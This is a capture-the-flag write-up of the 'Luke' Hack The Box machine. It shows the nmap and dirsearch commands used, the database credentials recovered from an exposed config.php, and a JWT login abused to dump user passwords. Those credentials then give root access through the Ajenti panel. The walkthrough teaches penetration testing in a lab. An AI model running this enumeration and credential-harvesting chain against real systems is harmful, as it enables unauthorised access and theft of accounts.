hacking-blogposts/Medium/42.md

---
search:
  exclude: true
---
# Luke Writeup

![](img/42.png)

## Introduction :

Luke is a FreeBSD Medium box that was released back in May 2019.

## **Part 1 : Initial Enumeration**

As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
    
    
      [ 85.171.153.138 ] [ /dev/pts/0 ] [Nextcloud/blog]
      → sudo nmap -vvv -sTU -p- 10.10.10.137 --max-retries 0 -Pn --min-rate=500 | grep Discovered
      Discovered open port 80/tcp on 10.10.10.137
      Discovered open port 22/tcp on 10.10.10.137
      Discovered open port 21/tcp on 10.10.10.137
      Discovered open port 3000/tcp on 10.10.10.137
      Discovered open port 8000/tcp on 10.10.10.137
    
      [ 85.171.153.138 ] [ /dev/pts/0 ] [Nextcloud/blog]
      → nmap -sCV -p21,22,80,3000,8000 10.10.10.137
      Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-23 10:21 BST
      Nmap scan report for 10.10.10.137
      Host is up (0.093s latency).
    
      PORT     STATE SERVICE VERSION
      21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)
      | ftp-anon: Anonymous FTP login allowed (FTP code 230)
      |_drwxr-xr-x    2 0        0             512 Apr 14  2019 webapp
      | ftp-syst:
      |   STAT:
      | FTP server status:
      |      Connected to 10.10.14.15
      |      Logged in as ftp
      |      TYPE: ASCII
      |      No session upload bandwidth limit
      |      No session download bandwidth limit
      |      Session timeout in seconds is 300
      |      Control connection is plain text
      |      Data connections will be plain text
      |      At session startup, client count was 2
      |      vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
      |_End of status
      22/tcp   open  ssh?
      |_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
      80/tcp   open  http    Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
      | http-methods:
      |_  Potentially risky methods: TRACE
      |_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
      |_http-title: Luke
      3000/tcp open  http    Node.js Express framework
      |_http-title: Site doesn't have a title (application/json; charset=utf-8).
      8000/tcp open  http    Ajenti http control panel
      |_http-title: Ajenti
    
      Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
      Nmap done: 1 IP address (1 host up) scanned in 178.00 seconds
    

## **Part 2 : Getting User Access**

Our nmap scan picked up port 21 with anonymous login so let's investigate it:
    
    
    
      [ 10.10.14.15 ] [ /dev/pts/0 ] [Nextcloud/blog]
      → ftp 10.10.10.137
      Connected to 10.10.10.137.
      220 vsFTPd 3.0.3+ (ext.1) ready...
      Name (10.10.10.137:nothing): anonymous
      331 Please specify the password.
      Password:
      230 Login successful.
      Remote system type is UNIX.
      Using binary mode to transfer files.
      ftp> ls
      200 PORT command successful. Consider using PASV.
      150 Here comes the directory listing.
      drwxr-xr-x    2 0        0             512 Apr 14  2019 webapp
      226 Directory send OK.
      ftp> cd webapp
      250 Directory successfully changed.
      ftp> ls
      200 PORT command successful. Consider using PASV.
      150 Here comes the directory listing.
      -r-xr-xr-x    1 0        0             306 Apr 14  2019 for_Chihiro.txt
      226 Directory send OK.
      ftp> get for_Chihiro.txt
      local: for_Chihiro.txt remote: for_Chihiro.txt
      200 PORT command successful. Consider using PASV.
      150 Opening BINARY mode data connection for for_Chihiro.txt (306 bytes).
      226 Transfer complete.
      306 bytes received in 0.00 secs (1.7903 MB/s)
      ftp> exit
      221 Goodbye.
    
      [ 10.10.14.15 ] [ /dev/pts/0 ] [Nextcloud/blog]
      → mkdir ~/_HTB/Luke && mv for_Chihiro.txt ~/_HTB/Luke
    
      [ 10.10.14.15 ] [ /dev/pts/0 ] [Nextcloud/blog]
      → cd ~/_HTB/Luke && file for_Chihiro.txt && cat for_Chihiro.txt
      for_Chihiro.txt: ASCII text
      Dear Chihiro !!
    
      As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of
      the actual website I've created .
      Normally you should know where to look but hurry up because I will delete them soon because of our security policies !
    
      Derry
    

looks like they have a bunch of sourcecode but not available through anonymous login via ftp, so we'll investigate port 80 instead which is a bootstrap4 template page:

![](prg/42_001.png)

Taking a look at port 3000 and 8000 are both more interesting: 

![](prg/42_002.png)

Which reveals us an Ajenti login webpage, and the node.js express framework JSON webapp our nmap scan picked up earlier. so let's investigate with gobuster what lies on the previous port 80:
    
    
      [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
      → dirsearch -u http://10.10.10.137 -e php
      git clone https://github.com/maurosoria/dirsearch.git
      dirsearch -u <****url> -e <****php,txt,html,js> -t 50 -x 500
    
       _|. _ _  _  _  _ _|_    v0.3.9
      (_||| _) (/_(_|| (_| )
    
      Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 6046
    
      Error Log: /home/nothing/Desktop/Tools/dirsearch/logs/errors-20-04-24_09-04-58.log
    
      Target: http://10.10.10.137
    
      [09:04:58] Starting:
      [09:05:02] 403 -  213B  - /.hta
      [09:05:02] 403 -  220B  - /.ht_wsr.txt
      [09:05:02] 403 -  222B  - /.htaccess-dev
      [09:05:02] 403 -  224B  - /.htaccess-local
      [09:05:02] 403 -  224B  - /.htaccess-marco
      [09:05:02] 403 -  222B  - /.htaccess.BAK
      [09:05:02] 403 -  223B  - /.htaccess.bak1
      [09:05:02] 403 -  222B  - /.htaccess.old
      [09:05:02] 403 -  223B  - /.htaccess.orig
      [09:05:02] 403 -  225B  - /.htaccess.sample
      [09:05:02] 403 -  223B  - /.htaccess.save
      [09:05:02] 403 -  222B  - /.htaccess.txt
      [09:05:02] 403 -  224B  - /.htaccess_extra
      [09:05:02] 403 -  223B  - /.htaccess_orig
      [09:05:02] 403 -  221B  - /.htaccess_sc
      [09:05:02] 403 -  221B  - /.htaccessBAK
      [09:05:02] 403 -  221B  - /.htaccessOLD
      [09:05:02] 403 -  222B  - /.htaccessOLD2
      [09:05:02] 403 -  219B  - /.htaccess~
      [09:05:02] 403 -  217B  - /.htgroup
      [09:05:02] 403 -  222B  - /.htpasswd-old
      [09:05:02] 403 -  223B  - /.htpasswd_test
      [09:05:02] 403 -  219B  - /.htpasswds
      [09:05:02] 403 -  217B  - /.htusers**[09:05:25] 200 -  202B  - /config.php**
      [09:05:27] 301 -  232B  - /css  ->  http://10.10.10.137/css/
      [09:05:34] 200 -    1KB - /gulpfile.js
      [09:05:36] 200 -    3KB - /index.md
      [09:05:38] 301 -  231B  - /js  ->  http://10.10.10.137/js/
      [09:05:39] 200 -    1KB - /LICENSE
      [09:05:40] 200 -    2KB - /login.php
      [09:05:41] 401 -  381B  - /management
      [09:05:41] 401 -  381B  - /management/
      [09:05:42] 301 -  235B  - /member  ->  http://10.10.10.137/member/
      [09:05:42] 200 -  216B  - /member/
      [09:05:46] 200 -    1KB - /package.json
      [09:05:51] 200 -    4KB - /README.md
    
      Task Completed
    

Here the interesting thing is config.php
    
    
      [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
      → curl -sk http://10.10.10.137/config.php
      $dbHost = 'localhost';
      $dbUsername = 'root';
      $dbPassword  = 'Zk6heYCyv6ZE9Xcg';
      $db = "login";
    
      $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error);
    
    

Which gives us credentials for a database on localhost root:Zk6heYCyv6ZE9Xcg. Now back on port 3000 the error message was "auth token is not supplied" Therefore we could use curl to supply the needed parameters of said token, whose password is the one we found earlier, but we had to guess the username, which was "admin" 

![](prg/42_003.png)

As you can see the credentials we found do not work on the login page of port 8000, so we'll use curl on the jwt application itself, especially on the login page: 
    
    
      [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
      → dirsearch -u http://10.10.10.137:3000 -e php,html,txt
      git clone https://github.com/maurosoria/dirsearch.git
      dirsearch -u  -e  -t 50 -x 500
    
       _|. _ _  _  _  _ _|_    v0.3.9
      (_||| _) (/_(_|| (_| )
    
      Extensions: php, html, txt | HTTP method: get | Threads: 10 | Wordlist size: 6748
    
      Error Log: /home/nothing/Desktop/Tools/dirsearch/logs/errors-20-04-24_09-24-12.log
    
      Target: http://10.10.10.137:3000
    
      [09:24:12] Starting:
      [09:24:58] 200 -   13B  - /login
      [09:24:58] 200 -   13B  - /Login
      [09:24:59] 200 -   13B  - /login/
      [09:25:21] 200 -   56B  - /users
      [09:25:21] 200 -   56B  - /users/
      [09:25:21] 200 -   56B  - /users/admin
    
    
    
      [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
      → curl -XPOST http://10.10.10.137:3000/login -H 'Content-Type: application/json' -d '{"username":"root","password":"Zk6heYCyv6ZE9Xcg"}'
      Forbidden
    
      [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
      → curl -XPOST http://10.10.10.137:3000/login -H 'Content-Type: application/json' -d '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg"}'
      {"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3MTg5LCJleHAiOjE1ODc4MDM1ODl9.atFsMshB6MFx3_wQIwgeqTsNgOobJHjLDQeK6QnzVhM"}
    

And there we have it ! Now we get a JWT token after logging in: 
    
    
    {"success":true,"message":"Authentication successful!",**"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3MTg5LCJleHAiOjE1ODc4MDM1ODl9.atFsMshB6MFx3_wQIwgeqTsNgOobJHjLDQeK6QnzVhM"**}
    

After reading JWT's documentation, In order to authenticate we add the following header to the get request on to view the contents of /users 
    
    
      Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3MTg5LCJleHAiOjE1ODc4MDM1ODl9.atFsMshB6MFx3_wQIwgeqTsNgOobJHjLDQeK6QnzVhM
    

So we use it to list the users on the box: 
    
    
      [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
      → curl -XPOST http://10.10.10.137:3000/login -H 'Content-Type: application/json' -d '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg"}'
      {"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI"}%
      [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
      → curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users
    
      [{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]
    

which we can use to list each of their passwords: 
    
    
      [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
      → curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users
    
      [{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]%
      [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
      → curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users/Dory
    
      {"name":"Dory","password":"5y:!xa=ybfe)/QD"}%
      [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
      → curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users/Derry
    
      {"name":"Derry","password":"rZ86wwLvx7jUxtch"}%
      [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
      → curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users/Yuri
    
      {"name":"Yuri","password":"bet@tester87"}%
      [ 10.10.14.15/23 ] [ /dev/pts/3 ] [~]
      → curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTg3NzE3NzQ2LCJleHAiOjE1ODc4MDQxNDZ9.og7r_8WkiyA2JbbIoyOsiYRhKTyLl17oPAIOMxuq3wI' http://10.10.10.137:3000/users/Admin
    
      {"name":"Admin","password":"WX5b7)>/rp$U)FW"}
    

` ![](prg/42_004.png)

We use derry's credentials to login : 

![](prg/42_005.png)

And we are logged in ! 

## **Part 3 : Getting Root Access**

From there we need to go to config.json where the ajenti credentials are: 

![](prg/42_006.png) **root:KpMasng6S5EtTy9Z** ![](prg/42_007.png)

Once logged in we are able to get more information about the box which is a FreeBSD 12.0-RELEASE amd64 machine. From there we simply head over to the terminal tab, from which we can execute commands as the root user, and therefore print out both flags.

![](prg/42_008.png)

## **Conclusion**

Here we can see the progress graph :

![](img/42_graph.png)